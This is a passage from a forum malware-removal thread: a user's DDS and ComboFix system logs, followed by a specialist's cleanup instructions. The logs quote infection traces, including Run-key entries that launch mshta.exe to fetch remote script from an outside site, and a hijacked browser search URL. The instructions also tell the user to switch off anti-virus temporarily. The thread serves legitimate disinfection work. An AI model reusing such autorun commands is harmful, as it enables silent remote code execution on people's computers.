FF - plugin: c:\program files\mozilla firefox\plugins\NPTURNMED.dll
FF - plugin: c:\program files\oracle\javafx 2.0 runtime\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\veoh networks\veoh\plugins\noreg\NPVeohVersion.dll
FF - plugin: c:\program files\veoh networks\veohwebplayer\npWebPlayerVideoPluginATL.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprpchrom ebrowserrecordext.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprphtml5 videoshim.dll
FF - plugin: c:\users\gagan\appdata\local\google\update\1.3.21.111\npGoogleUpdate3.dll
FF - plugin: c:\users\gagan\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgoogletalk.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgtpo3dautoplugin.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_235.dll
FF - plugin: c:\windows\system32\npDeployJava1.dll
FF - plugin: c:\windows\system32\npmproxy.dll
.
---- FIREFOX POLICIES ----
.
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2012-3-20 171064]
R1 MpKsl0ef4776f;MpKsl0ef4776f;c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys [2012-5-28 29904]
R2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-6-19 21504]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\progra~1\mcafee\sitead~1\mcsacore.exe [2011-5-24 95200]
R2 TeamViewer6;TeamViewer 6;c:\program files\teamviewer\version6\TeamViewer_Service.exe [2011-1-27 2253688]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\macromed\flash\FlashPlayerUpdateService.exe [2012-4-7 257696]
S3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2012-3-20 74112]
S3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\NisSrv.exe [2012-3-26 214952]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v040 0.exe [2010-3-18 753504]
S3 WSDPrintDevice;WSD Print Support via UMB;c:\windows\system32\drivers\WSDPrint.sys [2008-6-19 16896]
S4 dldt_device;dldt_device;c:\windows\system32\dldtcoms.exe -service --> c:\windows\system32\dldtcoms.exe -service [?]
S4 dldtCATSCustConnectService;dldtCATSCustConnectService;c:\windows\system32\s pool\drivers\w32x86\3\dldtserv.exe [2009-7-9 98984]
S4 Giraffic;Veoh Giraffic Video Accelerator;c:\program files\giraffic\veoh_girafficwatchdog.exe --service --> c:\program files\giraffic\Veoh_GirafficWatchdog.exe --service [?]
S4 StarWindServiceAE;StarWind AE Service;c:\program files\alcohol soft\alcohol 52\starwind\StarWindServiceAE.exe [2007-5-28 275968]
.
=============== Created Last 30 ================
.
2012-05-28 05:57:08 29904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys
2012-05-28 05:06:52 6737808 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\mpengine.dll
2012-05-23 20:07:25 6737808 ------w- c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2012-05-22 05:16:47 713784 ------w- c:\programdata\microsoft\microsoft antimalware\definition updates\{f78cef23-eb95-4ded-8458-48e319614326}\gapaengine.dll
2012-05-22 05:09:57 -------- d-----w- c:\program files\Microsoft Security Client
2012-05-19 08:37:25 6737808 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{3070ec37-30ca-43ae-ac15-bbe0716a8aad}\mpengine.dll
2012-05-19 05:43:51 -------- d-----w- c:\programdata\vsint
2012-05-14 22:57:56 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57:42 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57:41 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57:34 1404928 ----a-w- c:\program files\common files\microsoft shared\ink\InkObj.dll
2012-05-14 22:57:32 936960 ----a-w- c:\program files\common files\microsoft shared\ink\journal.dll
2012-05-14 22:57:20 1069056 ----a-w- c:\windows\system32\DWrite.dll
2012-05-14 22:57:19 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57:19 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
2012-05-14 22:57:18 683008 ----a-w- c:\windows\system32\d2d1.dll
2012-05-14 22:57:18 160768 ----a-w- c:\windows\system32\d3d10_1.dll
2012-05-14 22:56:51 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56:50 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56:49 2044928 ----a-w- c:\windows\system32\win32k.sys
2012-05-09 04:58:39 592824 ----a-w- c:\program files\mozilla firefox\gkmedias.dll
2012-05-09 04:58:39 44472 ----a-w- c:\program files\mozilla firefox\mozglue.dll
.
==================== Find3M ====================
.
2012-05-05 06:08:36 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2012-05-05 06:08:36 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2012-04-04 19:56:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44:12 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44:12 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
2012-02-29 15:11:45 5120 ----a-w- c:\windows\system32\wmi.dll
2012-02-29 15:11:42 172032 ----a-w- c:\windows\system32\wintrust.dll
2012-02-29 15:09:53 157696 ----a-w- c:\windows\system32\imagehlp.dll
2012-02-29 13:32:37 12800 ----a-w- c:\windows\system32\drivers\fs_rec.sys
2012-02-28 11:30:48 916992 ----a-w- c:\windows\system32\wininet.dll
2012-02-28 11:25:41 43520 ----a-w- c:\windows\system32\licmgr10.dll
2012-02-28 11:25:17 1469440 ----a-w- c:\windows\system32\inetcpl.cpl
2012-02-28 11:25:03 71680 ----a-w- c:\windows\system32\iesetup.dll
2012-02-28 11:25:03 109056 ----a-w- c:\windows\system32\iesysprep.dll
2012-02-28 10:07:57 385024 ----a-w- c:\windows\system32\html.iec
2012-02-28 08:12:52 133632 ----a-w- c:\windows\system32\ieUnatt.exe
2012-02-28 08:08:30 1638912 ----a-w- c:\windows\system32\mshtml.tlb
.
============= FINISH: 3:18:17.35 ===============
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
28-May-2012, 04:29 AM #6
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2011-08-26.01)
.
Microsoft® Windows Vista™ Home Premium
Boot Device: \Device\HarddiskVolume2
Install Date: 7/31/2007 3:06:08 PM
System Uptime: 5/28/2012 1:45:32 AM (2 hours ago)
.
Motherboard: TOSHIBA | | IALAA
Processor: AMD Turion(tm) 64 X2 Mobile Technology TL-56 | Socket M2/S1G1 | 1800/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 231 GiB total, 26.845 GiB free.
E: is CDROM ()
F: is CDROM ()
G: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft 6to4 Adapter
Device ID: ROOT\*6TO4MP\0000
Manufacturer: Microsoft
Name: Microsoft 6to4 Adapter
PNP Device ID: ROOT\*6TO4MP\0000
Service: tunnel
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft Tun Miniport Adapter
Device ID: ROOT\*TUNMP\0001
Manufacturer: Microsoft
Name: Teredo Tunneling Pseudo-Interface
PNP Device ID: ROOT\*TUNMP\0001
Service: tunmp
.
Class GUID: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Description: Canon MX860 ser Network
Device ID: ROOT\CANON_IJ_NETWORK\0000
Manufacturer: Canon
Name: Canon MX860 ser Network
PNP Device ID: ROOT\CANON_IJ_NETWORK\0000
Service: StillCam
.
==== System Restore Points ===================
.
.
==== Installed Programs ======================
.
µTorrent
Adobe Flash Player 11 Plugin
Adobe Flash Player ActiveX
Adobe Reader 8.1.5
Adobe Shockwave Player
Adobe® Photoshop® Album Starter Edition 3.2
AGEIA PhysX v7.07.09
Akamai NetSession Interface
Akamai NetSession Interface Service
ALPS Touch Pad Driver
Apple Application Support
Apple Mobile Device Support
Apple Software Update
Atheros Driver Installation Program
ATI Catalyst Install Manager
ATI Uninstaller
Bejeweled Deluxe 1.87
Bonjour
Camera Assistant Software for Toshiba
Canon IJ Network Scan Utility
Canon IJ Network Tool
Canon MX860 series MP Drivers
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center Localization Chinese Standard
Catalyst Control Center Localization Chinese Traditional
Catalyst Control Center Localization Dutch
Catalyst Control Center Localization Finnish
Catalyst Control Center Localization French
Catalyst Control Center Localization German
Catalyst Control Center Localization Greek
Catalyst Control Center Localization Hungarian
Catalyst Control Center Localization Italian
Catalyst Control Center Localization Japanese
Catalyst Control Center Localization Korean
Catalyst Control Center Localization Norwegian
Catalyst Control Center Localization Polish
Catalyst Control Center Localization Portuguese
Catalyst Control Center Localization Russian
Catalyst Control Center Localization Spanish
Catalyst Control Center Localization Swedish
Catalyst Control Center Localization Thai
Catalyst Control Center Localization Turkish
ccc-core-static
ccc-utility
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CCleaner
CD/DVD Drive Acoustic Silencer
CloneDVD2
Counter-Strike 1.0
Counter-Strike 1.6
Counter Strike 1.6 - By PirocaHP.F!N4LShare
Counter Strike 1.6 - Pack 112 Mapas - By PirocaHP F!N4LShare
D3DX10
Dell Driver Download Manager
Dell V305
DivX Converter
DivX Plus DirectShow Filters
DivX Setup
DivX Version Checker
DVD MovieFactory for TOSHIBA
DVDFab (Platinum/Gold/HD Decrypter) (Option: Mobile) 5.0.9.0
EA SPORTS(TM) Cricket 07
EPSON Easy Photo Print
EPSON WorkForce 30 Series Printer Uninstall
Google Chrome
Google Talk (remove only)
Google Talk Plugin
HD Tune 2.55
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
iPhone Configuration Utility
iTunes
Java Auto Updater
Java(TM) 6 Update 29
Java(TM) 7 Update 3
Java(TM) SE Development Kit 7 Update 2
Java(TM) SE Runtime Environment 6
JavaFX 2.0.2 SDK
JavaFX 2.0.3
K-Lite Mega Codec Pack 6.2.0
KB408682
Magic DVD Ripper V5.1.1
Magic ISO Maker v5.5 (build 0272)
Malwarebytes Anti-Malware version 1.61.0.1400
Max Payne
McAfee SiteAdvisor
Media Player Classic - Home Cinema v. 1.3.1249.0
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 4 Client Profile
Microsoft Application Error Reporting
Microsoft Flight Simulator X
Microsoft Office XP Professional with FrontPage
Microsoft Primary Interoperability Assemblies 2005
Microsoft Security Client
Microsoft Security Essentials
Microsoft Silverlight
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Works
Microsoft XML Parser
Mozilla Firefox 11.0 (x86 en-US)
MSVC80_x86
MSVCRT
MSXML 4.0 SP2 (KB927978)
MSXML 4.0 SP2 (KB936181)
MSXML 4.0 SP2 (KB941833)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MSXML 4.0 SP2 Parser and SDK
Need for Speed Underground 2
Need for Speed™ Most Wanted
Nero BackItUp
Nero BackItUp and Burn
Nero BurnRights
Nero Express
Nero RescueAgent
neroxml
Oblivion
OGA Notifier 2.0.0048.0
Pando Media Booster
PC Connectivity Solution
PCFriendly
Picasa 2
QuickTime
RealNetworks - Microsoft Visual C++ 2008 Runtime
Realtek 8169 PCI, 8168 and 8101E PCIe Ethernet Network Card Driver for Windows Vista
Realtek High Definition Audio Driver
RealUpgrade 1.1
Safari
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2657424)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2446708)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2478663)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2518870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2539636)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2572078)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2633870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)
Security Update for Windows Media Encoder (KB2447961)
Security Update for Windows Media Encoder (KB954156)
Security Update for Windows Media Encoder (KB979332)
Segoe UI
Skins
Skype™ 3.5
Spelling Dictionaries Support For Adobe Reader 8
Switch Sound File Converter
Synaptics Pointing Device Driver
Tales of Monkey Island
TeamViewer 6
Texas Instruments PCIxx21/x515/xx12 drivers.
TIPCI
TOSHIBA Assist
TOSHIBA Disc Creator
TOSHIBA DVD PLAYER
TOSHIBA Extended Tiles for Windows Mobility Center
TOSHIBA Flash Cards Support Utility
TOSHIBA Hardware Setup
Toshiba Registration
TOSHIBA SD Memory Utilities
TOSHIBA Software Modem
TOSHIBA Software Upgrades
TOSHIBA Supervisor Password
TOSHIBA Value Added Package
TuneUp Companion 2.2.7
TypingMaster Pro
Unity Web Player
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217)
Utility Common Driver
uTorrentControl Toolbar
VC80CRTRedist - 8.0.50727.6195
VCRedistSetup
Veoh Giraffic Video Accelerator
Veoh Web Player
VeohTV BETA
VideoLAN VLC media player 0.8.6f
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Messenger
Windows Live Photo Common
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Media Encoder 9 Series
Windows Media Player Firefox Plugin
WinImage
WinRAR archiver
Yahoo! Detect
Yahoo! Install Manager
Yahoo! Messenger
Zeus & Poseidon
.
==== Event Viewer Messages From Past Week ========
.
5/28/2012 12:57:13 AM, Error: Microsoft-Windows-SharedAccess_NAT [31004] - The DNS proxy agent was unable to allocate 0 bytes of memory. This may indicate that the system is low on virtual memory, or that the memory manager has encountered an internal error.
5/28/2012 1:48:09 AM, Error: Microsoft-Windows-DistributedCOM [10016] - The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
5/28/2012 1:47:38 AM, Error: Service Control Manager [7000] - The Parallel port driver service failed to start due to the following error: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
5/28/2012 1:47:31 AM, Error: PlugPlayManager [12] - The device 'PIONEER DVD-RW DVR-K17LF ATA Device' (IDE\CdRomPIONEER_DVD-RW_DVR-K17LF________________4.53____\5&383a5e59&0&0.0.0) disappeared from the system without first being prepared for removal.
5/28/2012 1:47:27 AM, Error: cdrom [15] - The device, \Device\CdRom0, is not ready for access yet.
5/28/2012 1:47:27 AM, Error: atapi [11] - The driver detected a controller error on \Device\Ide\IdePort2.
5/23/2012 3:53:51 PM, Error: EventLog [6008] - The previous system shutdown at 3:52:17 PM on 5/23/2012 was unexpected.
.
==== End Of File ===========================
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
28-May-2012, 04:31 AM #7
also i don't know if it helps my physical memory usage always is above 50%
Mark1956's Avatar
Malware Removal Specialist with 14,074 posts.
 
Join Date: May 2011
Location: Spain
Experience: Advanced
28-May-2012, 04:56 AM #8
Ok, thanks for the logs. Please now follow this to run Combofix and post the log.

IMPORTANT
I see you have a P2P File Sharing Program installed on your system: uTorrent.
As long as you continue to use these types of programs you can expect to get infected.
P2P file sharing is one of the most common sources for picking up infections.
Please uninstall the program from your system in Programs & Features via the Control Panel.
If you insist in keeping it on your system then please DO NOT USE IT until we are finished.

STEP 1



NOTE: If you have already used Combofix please delete the icon from your desktop.
  • Please download DeFogger and save it to your desktop.
  • Once downloaded, double-click on the DeFogger icon to start the tool.
  • The application window will appear.
  • You should now click on the Disable button to disable your CD Emulation drivers.
  • When it prompts you whether or not you want to continue, please click on the Yes button to continue.
  • When the program has completed you will see a Finished! message. Click on the OK button to exit the program.
  • If CD Emulation programs are present and have been disabled, DeFogger will now ask you to reboot the machine. Please allow it to do so by clicking on the OK button.
STEP 2



Please download ComboFix from one of the locations below and save it to your Desktop. <-Important!!!Be sure to print out and follow these instructions: A guide and tutorial on using ComboFix



Vista/Windows 7 users can skip the Recovery Console instructions and use the Windows DVD to boot into the Vista Recovery Environment or Windows 7 System Recovery Options if something goes awry. If you do not have a Windows 7 DVD then please create a Windows 7 Repair Disc. XP users need to install the Recovery Console first.
  • Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results". Click this link to see a list of such programs and how to disable them.
  • If ComboFix detects an older version of itself, you will be asked to update the program.
  • ComboFix will begin by showing a Disclaimer. Read it and click I Agree if you want to continue.
  • Follow the prompts and click on Yes to continue scanning for malware.
  • If using Windows 7 or Vista and you receive a UAC prompt asking if you want to continue running the program, you should press the Continue button.
  • When finished, please copy and paste the contents of C:\ComboFix.txt (which will open after reboot) in your next reply.
  • Be sure to re-enable your anti-virus and other security programs.
-- Do not touch your mouse/keyboard until the ComboFix scan has completed, as this may cause the process to stall or the computer to lock.
-- ComboFix will temporarily disable your desktop, and if interrupted may leave it disabled. If this occurs, please reboot to restore it.
-- ComboFix disables autorun of all CD, floppy and USB devices to assist with malware removal and increase security.
If you no longer have access to your Internet connection after running ComboFix, please reboot to restore it. If that does not restore the connection, then follow the instructions for Manually restoring the Internet connection provided in the "How to Guide" you printed out earlier.
Quote:
Do NOT use ComboFix unless you have been instructed to do so by a Malware Removal Expert. It is a powerful tool intended by its creator to be used under the guidance and supervision of an expert, NOT for general public or personal use. Using this tool incorrectly could lead to serious problems with your operating system such as preventing it from ever starting again. This site, sUBs and myself will not be responsible for any damage caused to your machine by misusing or running ComboFix on your own. Please read ComboFix's Disclaimer.

Last edited by Mark1956; 28-May-2012 at 05:15 AM..
gagraptor's Avatar
gagraptor gagraptor is offline
Computer Specs
Member with 31 posts.
THREAD STARTER
 
Join Date: May 2012
Experience: Beginner
28-May-2012, 11:02 PM #9
ComboFix 12-05-28.05 - GAGAN 05/28/2012 22:36:29.1.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.999 [GMT -4:00]
Running from: c:\users\GAGAN\Downloads\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\programdata\xp
c:\programdata\xp\EBLib.dll
c:\programdata\xp\TPwSav.sys
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome.manifest
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome\content\overlay.xul
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\install.rdf
c:\windows\system32\CTF
c:\windows\system32\CTF\ctfmon.txt
c:\windows\system32\CTF\Links\OtherProducts.html
.
.
((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-29 )))))))))))))))))))))))))))))))
.
.
2012-05-28 05:06 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A66FBB99-C8AC-44BC-83F6-4037B1F477F7}\mpengine.dll
2012-05-23 20:07 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2012-05-22 05:16 . 2012-05-22 05:16 713784 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
2012-05-22 05:09 . 2012-05-22 05:10 -------- d-----w- c:\program files\Microsoft Security Client
2012-05-19 08:37 . 2012-05-08 16:40 6737808 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
2012-05-19 05:43 . 2012-05-19 09:50 -------- d-----w- c:\programdata\vsint
2012-05-14 22:57 . 2012-03-20 23:28 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57 . 2012-03-30 12:39 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57 . 2012-03-29 13:39 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57 . 2012-02-01 15:10 1404928 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
2012-05-14 22:57 . 2012-02-01 15:10 936960 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2012-05-14 22:57 . 2012-02-29 13:41 1069056 ----a-w- c:\windows\system32\DWrite.dll
2012-05-14 22:57 . 2012-03-01 14:46 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57 . 2012-02-29 14:08 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
2012-05-14 22:57 . 2012-03-01 14:46 160768 ----a-w- c:\windows\system32\d3d10_1.dll
2012-05-14 22:57 . 2012-02-29 13:44 683008 ----a-w- c:\windows\system32\d2d1.dll
2012-05-14 22:56 . 2012-04-03 08:16 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56 . 2012-04-03 08:16 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56 . 2012-04-02 13:36 2044928 ----a-w- c:\windows\system32\win32k.sys
2012-05-09 04:58 . 2012-05-09 04:58 592824 ----a-w- c:\program files\Mozilla Firefox\gkmedias.dll
2012-05-09 04:58 . 2012-05-09 04:58 44472 ----a-w- c:\program files\Mozilla Firefox\mozglue.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-05-05 06:08 . 2012-04-07 05:22 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2012-05-05 06:08 . 2011-06-14 22:11 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2012-04-04 19:56 . 2010-02-20 07:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44 . 2012-03-21 00:44 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44 . 2012-03-21 00:44 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
2012-02-29 15:11 . 2012-04-14 06:43 5120 ----a-w- c:\windows\system32\wmi.dll
2012-02-29 15:11 . 2012-04-14 06:43 172032 ----a-w- c:\windows\system32\wintrust.dll
2012-02-29 15:09 . 2012-04-14 06:43 157696 ----a-w- c:\windows\system32\imagehlp.dll
2012-02-29 13:32 . 2012-04-14 06:43 12800 ----a-w- c:\windows\system32\drivers\fs_rec.sys
2012-05-09 04:58 . 2011-06-08 03:45 97208 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
2011-05-09 08:49 176936 ----a-w- c:\program files\uTorrentControl\prxtbuTor.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1" [?]
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP" [?]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"Skytel"="Skytel.exe" [2007-05-29 1826816]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\syste m]
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
